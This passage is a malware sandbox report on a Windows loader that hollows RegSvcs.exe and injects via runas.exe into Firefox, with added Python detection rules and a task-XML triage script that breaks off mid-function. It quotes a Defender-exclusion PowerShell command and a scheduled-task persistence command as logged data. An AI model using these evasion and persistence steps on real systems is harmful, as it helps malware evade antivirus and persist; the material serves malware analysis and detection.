                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B2582 mov ecx, dword ptr fs:[00000030h]7_2_012B2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE59C mov eax, dword ptr fs:[00000030h]7_2_012EE59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EC5ED mov eax, dword ptr fs:[00000030h]7_2_012EC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EC5ED mov eax, dword ptr fs:[00000030h]7_2_012EC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE5E7 mov eax, dword ptr fs:[00000030h]7_2_012DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B25E0 mov eax, dword ptr fs:[00000030h]7_2_012B25E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE5CF mov eax, dword ptr fs:[00000030h]7_2_012EE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE5CF mov eax, dword ptr fs:[00000030h]7_2_012EE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B65D0 mov eax, dword ptr fs:[00000030h]7_2_012B65D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EA5D0 mov eax, dword ptr fs:[00000030h]7_2_012EA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EA5D0 mov eax, dword ptr fs:[00000030h]7_2_012EA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AE420 mov eax, dword ptr fs:[00000030h]7_2_012AE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AE420 mov eax, dword ptr fs:[00000030h]7_2_012AE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AE420 mov eax, dword ptr fs:[00000030h]7_2_012AE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AC427 mov eax, dword ptr fs:[00000030h]7_2_012AC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01336420 mov eax, dword ptr fs:[00000030h]7_2_01336420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01336420 mov eax, dword ptr fs:[00000030h]7_2_01336420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01336420 mov eax, dword ptr fs:[00000030h]7_2_01336420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01336420 mov eax, dword ptr fs:[00000030h]7_2_01336420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01336420 mov eax, dword ptr fs:[00000030h]7_2_01336420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01336420 mov eax, dword ptr fs:[00000030h]7_2_01336420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01336420 mov eax, dword ptr fs:[00000030h]7_2_01336420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EA430 mov eax, dword ptr fs:[00000030h]7_2_012EA430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E8402 mov eax, dword ptr fs:[00000030h]7_2_012E8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E8402 mov eax, dword ptr fs:[00000030h]7_2_012E8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E8402 mov eax, dword ptr fs:[00000030h]7_2_012E8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133C460 mov ecx, dword ptr fs:[00000030h]7_2_0133C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DA470 mov eax, dword ptr fs:[00000030h]7_2_012DA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DA470 mov eax, dword ptr fs:[00000030h]7_2_012DA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DA470 mov eax, dword ptr fs:[00000030h]7_2_012DA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136A456 mov eax, dword ptr fs:[00000030h]7_2_0136A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE443 mov eax, dword ptr fs:[00000030h]7_2_012EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A645D mov eax, dword ptr fs:[00000030h]7_2_012A645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D245A mov eax, dword ptr fs:[00000030h]7_2_012D245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B64AB mov eax, dword ptr fs:[00000030h]7_2_012B64AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133A4B0 mov eax, dword ptr fs:[00000030h]7_2_0133A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E44B0 mov ecx, dword ptr fs:[00000030h]7_2_012E44B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136A49A mov eax, dword ptr fs:[00000030h]7_2_0136A49A
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe" (excludes the dropped copy from Defender scanning)
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe | Direct syscalls, in the order reported:
                    NtResumeThread: Direct from: 0x773836AC
                    NtMapViewOfSection: Direct from: 0x77382D1C
                    NtWriteVirtualMemory: Direct from: 0x77382E3C
                    NtProtectVirtualMemory: Direct from: 0x77382F9C
                    NtSetInformationThread: Direct from: 0x773763F9
                    NtCreateMutant: Direct from: 0x773835CC
                    NtNotifyChangeKey: Direct from: 0x77383C2C
                    NtSetInformationProcess: Direct from: 0x77382C5C
                    NtCreateUserProcess: Direct from: 0x7738371C
                    NtQueryInformationProcess: Direct from: 0x77382C26
                    NtResumeThread: Direct from: 0x77382FBC
                    NtWriteVirtualMemory: Direct from: 0x7738490C
                    NtAllocateVirtualMemory: Direct from: 0x77383C9C
                    NtReadFile: Direct from: 0x77382ADC
                    NtAllocateVirtualMemory: Direct from: 0x77382BFC
                    NtDelayExecution: Direct from: 0x77382DDC
                    NtQuerySystemInformation: Direct from: 0x77382DFC
                    NtOpenSection: Direct from: 0x77382E0C
                    NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                    NtQuerySystemInformation: Direct from: 0x773848CC
                    NtCreateKey: Direct from: 0x77382C6C
                    NtReadVirtualMemory: Direct from: 0x77382E8C
                    NtClose: Direct from: 0x77382B6C
                    NtAllocateVirtualMemory: Direct from: 0x773848EC
                    NtQueryAttributesFile: Direct from: 0x77382E6C
                    NtSetInformationThread: Direct from: 0x77382B4C
                    NtQueryInformationToken: Direct from: 0x77382CAC
                    NtOpenKeyEx: Direct from: 0x77382B9C
                    NtAllocateVirtualMemory: Direct from: 0x77382BEC
                    NtDeviceIoControlFile: Direct from: 0x77382AEC
                    NtCreateFile: Direct from: 0x77382FEC
                    NtOpenFile: Direct from: 0x77382DCC
                    NtTerminateThread: Direct from: 0x77377B2E
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A (4D5A is "MZ": a PE image is being written over the host's image base)
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A (the same MZ write, repeated by the persisted copy)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\SysWOW64\runas.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\runas.exe | Section loaded: NULL target: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe protection: read write
                Source: C:\Windows\SysWOW64\runas.exe | Section loaded: NULL target: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\runas.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\runas.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\runas.exe | Thread register set: target process: 1136
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe | Process created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe" (no /user or command argument, which legitimate runas use always carries)
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000, 401000, B87008
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000, 401000, F86008
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe"
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp"
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp"
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe | Process created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
                Source: C:\Windows\SysWOW64\runas.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
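The process tree recorded above (a PowerShell Add-MpPreference exclusion for the dropped file, a scheduled task registered from an XML file in Temp, RegSvcs.exe and runas.exe both launched with an empty command line by an untrusted parent) is exactly what a process-creation rule set should key on. The following is an added example, not part of the Joe Sandbox report and not the sample's own code: it encodes those four observations as rules over Sysmon-style process-creation records. The event records are constructed from the command lines listed above, the last (benign) event is invented as a control, and the field names image, cmdline and parent_image are assumptions rather than any real log schema.

```python
"""Process-creation rules for the loader behaviour in this report.

Added example, not from the Joe Sandbox report. The events below are
constructed from the command lines the report lists; the last one is an
invented benign control. Field names are assumptions, not a real schema.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    cmdline: str        # its command line as logged
    parent_image: str   # full path of the creating process


# Constructed events mirroring the report's process tree.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
              r'-ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe"',
              r"C:\Users\user\Desktop\Inquiry files v2.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" '
              r'/XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp"',
              r"C:\Users\user\Desktop\Inquiry files v2.exe"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"',
              r"C:\Users\user\AppData\Roaming\WOzeoJQi.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\runas.exe",
              r'"C:\Windows\SysWOW64\runas.exe"',
              r"C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe"),
    # Invented benign control: an admin excluding a build directory from a console.
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe Add-MpPreference -ExclusionPath "D:\Build\out"',
              r"C:\Windows\System32\cmd.exe"),
]

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Desktop|Downloads|Documents)\\", re.I)
TEMP_DIR = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.I)
TRUSTED_DIR = re.compile(r"^[A-Z]:\\(Windows|Program Files( \(x86\))?)\\", re.I)
# Signed .NET utilities that loaders commonly hollow; they are normally launched with arguments.
HOLLOW_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def args_of(cmdline: str) -> str:
    """Strip the leading (possibly quoted) image token and return the remaining arguments."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline, re.S)
    return (m.group(1) if m else cmdline).strip()


def quoted_or_bare(flag: str, args: str) -> str:
    """Value following `flag` (a regex), in either "quoted path" or bare form; '' if absent."""
    m = re.search(flag + r'\s+(?:"([^"]+)"|(\S+))', args, re.I)
    return (m.group(1) or m.group(2)) if m else ""


def check(ev: ProcEvent) -> list[tuple[str, str]]:
    """Return (rule, severity) pairs that fire for one event."""
    hits: list[tuple[str, str]] = []
    img, args = basename(ev.image), args_of(ev.cmdline)

    # 1. Defender exclusion added from PowerShell. An exclusion for a user-writable
    #    path (the dropped WOzeoJQi.exe here) is a stronger signal than a build dir.
    if img in ("powershell.exe", "pwsh.exe") and re.search(r"\bAdd-MpPreference\b", args, re.I):
        target = quoted_or_bare(r"-Exclusion(?:Path|Process|Extension)", args)
        hits.append(("defender_exclusion_added", "high" if USER_WRITABLE.search(target) else "medium"))

    # 2. Scheduled task registered from an XML definition written to a temp directory.
    if img == "schtasks.exe" and re.search(r"/create\b", args, re.I):
        if TEMP_DIR.search(quoted_or_bare(r"/xml", args)):
            hits.append(("schtask_from_temp_xml", "high"))

    # 3. A signed .NET utility started with an empty command line by a parent outside
    #    Windows or Program Files: the process-creation half of the hollowing the report
    #    records as an MZ header written to base 0x400000 in RegSvcs.exe.
    if img in HOLLOW_HOSTS and not args and not TRUSTED_DIR.match(ev.parent_image):
        hits.append(("hollow_host_no_args", "high"))

    # 4. runas.exe with no arguments: legitimate use always passes /user and a command.
    if img == "runas.exe" and not args:
        hits.append(("runas_no_args", "high"))
    return hits


def scan(events: list[ProcEvent]) -> list[list[tuple[str, str]]]:
    """Run check() over every event, preserving order so results align with the input."""
    return [check(ev) for ev in events]


if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(f"{basename(ev.image):>16}  {hits or '-'}")
```

Rule 3 deliberately does not fire on the memory-write evidence (that needs Sysmon event 8/10 or an EDR hook); it only gives the cheap process-creation precursor, so pair it with the MZ-at-image-base write if that telemetry is available. The benign control shows why rule 1 grades by target path rather than blocking every Add-MpPreference outright.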
                Source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3374886895.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, YIJBuAgnqfKMtZ.exe, 0000000F.00000000.2493595715.0000000001B11000.00000002.00000001.00040000.00000000.sdmp | Binary or memory strings: IProgram Manager, Shell_TrayWnd, Progman, Progmanlock (Explorer desktop and taskbar window class/title names)
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Queries volume information:
                    C:\Users\user\Desktop\Inquiry files v2.exe
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll
                    C:\Windows\Fonts\micross.ttf
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information (repeated queries of the same file collapsed, count in parentheses):
                    C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (6)
                    C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
                    C:\
                    C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
                    C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
                    C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll
                    C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat
                    C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll
                    C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (7)
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Queries volume information:
                    C:\Users\user\AppData\Roaming\WOzeoJQi.exe
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
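The task registered above (schtasks /Create /TN "Updates\WOzeoJQi" /XML from tmp35FF.tmp and again from tmp5B3B.tmp) is the persistence artifact a responder should export and read, but the report does not reproduce the XML. The following added example, not from the report and not the sample's own code, parses a Task Scheduler definition in the standard task XML schema and pulls out the properties that decide whether a task is worth worrying about: what it runs and from where, what triggers it, how often it repeats, and whether it is hidden or elevated. The sample task is constructed to resemble such a registration; its triggers, settings and author are assumptions, since the real tmp35FF.tmp contents are not in the report.

```python
"""Triage of a Task Scheduler XML definition (schtasks /Create /XML <file>).

Added example, not from the Joe Sandbox report. The XML below is constructed
to resemble a task like "Updates\\WOzeoJQi"; the real tmp35FF.tmp contents are
not in the report, so trigger values and settings are assumptions.
"""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample. Real schtasks exports are usually UTF-16 with a BOM; pass those
# to ET.fromstring() as bytes and the parser picks the encoding up itself.
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>user</Author></RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
    <TimeTrigger>
      <Repetition><Interval>PT1M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2024-07-15T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal>
  </Principals>
  <Settings><Hidden>true</Hidden><StartWhenAvailable>true</StartWhenAvailable></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\\Users\\user\\AppData\\Roaming\\WOzeoJQi.exe</Command></Exec>
  </Actions>
</Task>"""

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Desktop|Downloads|Documents)\\", re.I)
_DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def duration_seconds(iso: str) -> int:
    """Convert the ISO 8601 duration form Task Scheduler uses (PT1M, P1DT2H, ...) to seconds."""
    m = _DURATION.match(iso.strip())
    if not m:
        raise ValueError(f"unsupported duration: {iso!r}")
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def _text(node, path: str) -> str:
    """Text of the first child matching `path` (namespace-qualified), or '' if missing."""
    el = node.find(path, NS) if node is not None else None
    return (el.text or "").strip() if el is not None else ""


def triage_task_xml(xml_text: str | bytes) -> dict:
    """Extract the security-relevant fields of a task definition and list findings."""
    root = ET.fromstring(xml_text)
    commands = [_text(ex, "t:Command") for ex in root.findall("t:Actions/t:Exec", NS)]
    trig_root = root.find("t:Triggers", NS)
    trig_nodes = list(trig_root) if trig_root is not None else []
    triggers = [t.tag.split("}")[-1] for t in trig_nodes]           # strip the namespace
    intervals = [duration_seconds(_text(t, "t:Repetition/t:Interval"))
                 for t in trig_nodes if t.find("t:Repetition/t:Interval", NS) is not None]
    run_level = _text(root, "t:Principals/t:Principal/t:RunLevel")
    hidden = _text(root, "t:Settings/t:Hidden").lower() == "true"

    findings: list[str] = []
    if any(USER_WRITABLE.search(c) for c in commands):
        findings.append("action_in_user_writable_path")
    if "LogonTrigger" in triggers or "BootTrigger" in triggers:
        findings.append("starts_at_logon_or_boot")
    if any(i <= 300 for i in intervals):
        findings.append("repeats_every_5min_or_less")
    if hidden:
        findings.append("hidden_task")
    if run_level == "HighestAvailable":
        findings.append("runs_elevated")
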